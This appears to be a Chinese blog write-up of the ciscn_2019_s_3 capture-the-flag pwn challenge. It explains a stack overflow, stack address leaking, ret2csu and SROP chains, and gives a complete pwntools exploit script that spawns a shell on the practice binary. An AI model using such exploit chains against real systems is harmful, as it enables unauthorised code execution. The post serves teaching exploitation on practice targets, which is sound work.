csicn_2019_s_3

最新推荐文章于 2023-09-23 17:10:22 发布
最新推荐文章于 2023-09-23 17:10:22 发布
阅读量319 收藏 3
点赞数 2
分类专栏: pwn题 文章标签: 安全 web安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Morphy_Amo/article/details/123317804
版权

ciscn_2019_s_3

注意

在本地调试的时候注意libc版本,我本地的版本是2.31,在计算栈的偏移时是0x128,但是线上靶场的环境栈的偏移是0x118

在本地可以利用patchelf切换libc版本

patchelf --set-interpreter ~/Tools/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/ld-2.23.so --set-rpath ~/Tools/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/ ./ciscn_s_3

  1. 安全策略

    [*] '/root/ctf/buuctf/pwn/ciscn_s_3'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

  2. 分析

    程序的功能很简单,接受一段输入,然后输出。接受输入的栈大小为0X10,而读入的最大限制是0x400,明显存在溢出。

    binsh字符串

    有几点需要注意,本题没有引用函数,而使用syscall实现的读写,因此无法通过泄露got表的方法去获取libc地 址,进而获取/bin/sh,所以需要考虑自己写入/bin/sh然后再调用。通过调试可以发现读入数据时,rsp向下0x10的位置是字符串ciscn_s_3的地址,通过计算发现这个字符串和自己写入的/bin/sh的偏移是恒定的0x128。由此即可获取/bin/sh的地址。

在这里插入图片描述

利用execve

构造execve('/bin/sh',0,0)。这里使用万能gadget构造ROP

# r12 = 返回调用的地址
# r13 = 参数三
# r14 = 参数二
# r15d = 参数一,这里我们需要传入的binsh地址是栈中的地址,只传低4位不能满足,因此我们需要额外再给rdi进行一次赋值
# 按照我们的溢出构造方式,binsh到pop_rdi_ret的偏移正好是0x50,因此返回地址就是binsh+0x50
retaddr = binsh + 0x50
payload = b'/bin/sh'.ljust(0x10, b'\x00')
payload += p64(pop_rbx_rbp_r12_r13_r14_r15) + p64(0) + p64(0x1) + p64(retaddr) + p64(0) + p64(0) + p64(0)
payload += p64(mov_rdx_r13)
payload += p64(pop_rdi_ret) + p64(binsh)
payload += p64(mov_rax_11) + p64(syscall)

利用sigreturn

构造如下的fake frame,然后调用15号系统调用就可以了

fake_frame = SigreturnFrame()
fake_frame.rax = 0x3b
fake_frame.rdi = binsh
fake_frame.rsi = 0
fake_frame.rdx = 0
fake_frame.rip = syscall

payload = b'/bin/sh'.ljust(0x10, b'\x00')
payload += p64(mov_rax_15) + p64(syscall) 
payload += bytes(fake_frame)

  1. exp

    from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./ciscn_s_3')
leak_got = elf.got['__libc_start_main']

vuln = 0x004004ed
syscall = 0x00400517
ret = 0x00400519
# rdi
pop_rdi_ret = 0x004005a3
# rdx
pop_rbx_rbp_r12_r13_r14_r15_ret = 0x0040059a
mov_rdx_r13 = 0x00400580
#conn = remote('node4.buuoj.cn',27244)
conn = process('ciscn_s_3')

#gdb.attach(conn, 'b *0x004004ed')

payload = b'/bin/sh' 
payload = payload.ljust(0x10, b'\x00')
payload += p64(vuln)
conn.send(payload)
res = conn.recv(0x30)[0x20:0x26]
binsh = u64(res+b'\x00\x00') - 0x118		# 注意libc版本,2.31版本这里是0x128
print(f'binsh : {hex(binsh)}')
def exp1():
    mov_rax_59 = 0x004004e2
    
    payload = b'/bin/sh'.ljust(0x10, b'\x00')
    # r14 => rsi = 0
    # r13 => rdx = 0, r12 = syscall
    payload += p64(pop_rbx_rbp_r12_r13_r14_r15_ret) + p64(0) + p64(0x1) + p64(binsh + 0x50) + p64(0) + p64(0) + p64(binsh)
    payload += p64(mov_rdx_r13)
    # r15 => rdi = binsh
    payload += p64(pop_rdi_ret) + p64(binsh)
    # rax = 59
    payload += p64(mov_rax_59) 
    payload += p64(syscall)
    conn.send(payload) 
    conn.recv()
    conn.interactive()

def exp2():
    mov_rax_15 = 0x004004da
    
    # fake signal frame
    fake_frame = SigreturnFrame()
    fake_frame.rax = 0x3b
    fake_frame.rdi = binsh
    fake_frame.rsi = 0
    fake_frame.rdx = 0
    #fake_frame.rsp = binsh + 0x10
    fake_frame.rip = syscall
    print(fake_frame)

    payload = b'/bin/sh'.ljust(0x10, b'\x00')
    payload += p64(mov_rax_15) + p64(syscall) 
    payload += bytes(fake_frame)

    conn.send(payload)
    conn.recv()
    conn.interactive()
   
if __name__ == "__main__":
    exp1()
Morphy_Amo
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ciscn_2019_s_3
qq_45691294的博客
12-29 2145
首先拿到程序先查看一下程序类型 是一个x86-64的ELF文件,查看一下保护,只开启了堆栈不可执行保护 用IDA分析一下该程序 main函数直接进入到vuln函数,这里利用了系统调用,64位的系统调用的传参方式为 首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 vuln函数执行了read(0,buf,0x400),又执行了write(1,buf,0x30)。看一下buf的位置,发现距离rbp只有0x10大小,存在栈溢出 这里的栈
buuctf|ciscn_2019_s_3 1
m0_64236521的博客
05-21 307
buuctf|ciscn_2019_s_3 1 如下图 明显的栈溢出 这里调用了系统号为0x3B(十进制为59)的函数,查下表 是exeve(‘/bin/sh’,0,0),为了控制寄存器使其第一个参数为/bin/sh,其余为0,需要用到csu控制寄存器 exp如下 from pwn import* #p=process('./pwn_30') p=remote('node4.buuoj.cn',27704) pop_bx_bp_12_13_14_15=0x40059A csu_2=0x400580 s
ciscn_2019_s_3(execve&&sigreturn)
qq_33590156的博客
08-04 214
本题是一个系统调用,存在栈溢出,要点有以下几点,以下为第一种解法,构造execve(’/bin/sh’,0,0) 1.题目中,并未出现sub esp得字眼,所以本题中ebp一直与esp重合,即最后ret得时候,pop的其实是rbp处的地址,所以本题返回点并不在ret处,而在rbp处。 2.本题没有‘/bin/sh’,所以只能自己输入到栈上,这时就需要泄漏栈的地址,在使用gdb调试后,可以看到在ret地址后面有存储一个栈地址(即可以泄漏),再在调用syswrite时,可以看到buf的地址,经过计算后,得出偏移
BUUCTF ciscn_2019_s_3 对于零基础小白很烧脑的一道入门题
weixin_44447516的博客
08-25 241
pwn buuctf ciscn_2019_s_3 入门
【CTF】【PWN】ciscn_s_3题解
m0_50819561的博客
09-23 734
前置知识: 64位系统: 传参方式:首先将系统调用号 传入 rax,然后将参数从左到右依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 调用号:sys_read 的调用号为0,sys_write 的调用号 为1 stub_execve 的调用号为59,stub_rt_sigreturn 的调用号为15 调用方式: 使用 syscall 进行系统调用 首先惯例checksec一下。发现NX保护开了。 用IDA打开文件之后返现main函数里面套了一个vuln函数。跟进去查看如下 tab转汇编
2019ciscn_s_3
Hyrink的博客
06-07 447
ciscn_s_3的两种解法:SROP & ret2csu详解
ctf【ciscn_2019_s_3】
HUANGliang_的博客
10-29 464
ciscn_2019_s_3
ciscn_2019_s_3(系统调用综合)
weixin_61283545的博客
06-11 700
打开函数只有read和write。发现gadget函数,这道题重要关键在于系统调用号。发现gadget rax赋值为59,调用execve,ida H键变10进制,调用execve需要$rax==59$rdi==“/bin/sh”$rsi==0$rdx==0syscall这时候就需要用到libc_csu辅助,ropper里面可以找到pop rdi,/bin/sh\x00我们可以直接通过read写入栈中,其他的利用gadget进行填充。 注意的是read后面没有leave不用填充。还有一点在执行csu_e
详细ciscn_2019_s_3题解
xieyichensss的博客
04-23 1358
来了来了,我拖了好久,因为吧,之前做了个堆题,大概用了一周才做完,做完堆题,下一个题是栈的,我以为会很简单,但是对我来说很难诶。上才艺… (系统调用其他师傅都有写,我就不赘述啦啦啦啦啦),因为师傅们翻到我这里肯定对系统调用有了解了呀,我这么菜,只能在最下边呜呜呜。 1.拖入ida,反汇编(64位),注意到函数传参与32位会不同。 在函数框内发现vuln(大家应该对这种函数很熟悉了吧),还有gadgets函数,奇怪,正常的栈不会有这种东西啊,于是我就点进去看了看,看到了这两个像rax进行传参的汇编,这就为我们
Ret2csu level5 & ciscn_2019_s_3
红叶的博客
11-06 417
本题难点:对栈的理解需要稍微更深入一点。
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1780
这里写自定义目录标题漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
[PWN] ciscn_2019_s_3 ret2csu SROP
最新发布
LDX的博客
09-23 56
[PWN] ret2csu SROP
pwn】ciscn_2019_s_3
Nothing
12-14 4498
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
buuctf ciscn_2019_s_3
carol2358的博客
04-20 1330
这题对还是萌新的我来说有点难,用的SROP 在这里插入图片描述
CTF buuoj pwn-----第12题: ciscn_2019_s_3
bing_Max的博客
10-09 1470
函数分析 编写exp from pwn import * sh = remote('node4.buuoj.cn', 27939) context(arch='amd64',os='linux', log_level='debug') main_addr= 0x4004ED # 这里其实是vuln的地址, main地址会错:timeout: the monitored command dumped core payload_1 = b'/bin/sh\x00' + b'a'*0x8 + p.
Pwn】ciscn_2019_s_3 wp 解析(bin/sh+0x50)
Lcw_linyx的博客
05-09 1100
本题用到了ret2csu,也可通过srop,重点讲/bin/sh+0x50
【BUUCTF - PWN】ciscn_2019_s_3
古月浪子的博客
04-17 739
checksec一下,栈溢出 IDA打开看看,main函数内只有一个call vuln 注意到vuln函数末尾并没有使用leave指令,即直接把之前push的rbp当作return address 我们要ROP的话offset只需要0x10 程序里还给了一些gadget,注意到当rax=0x3b时syscall为execve,只需要让rdi="/bin/sh"、rsi=0、rdx=0即可ge...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Morphy_Amo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值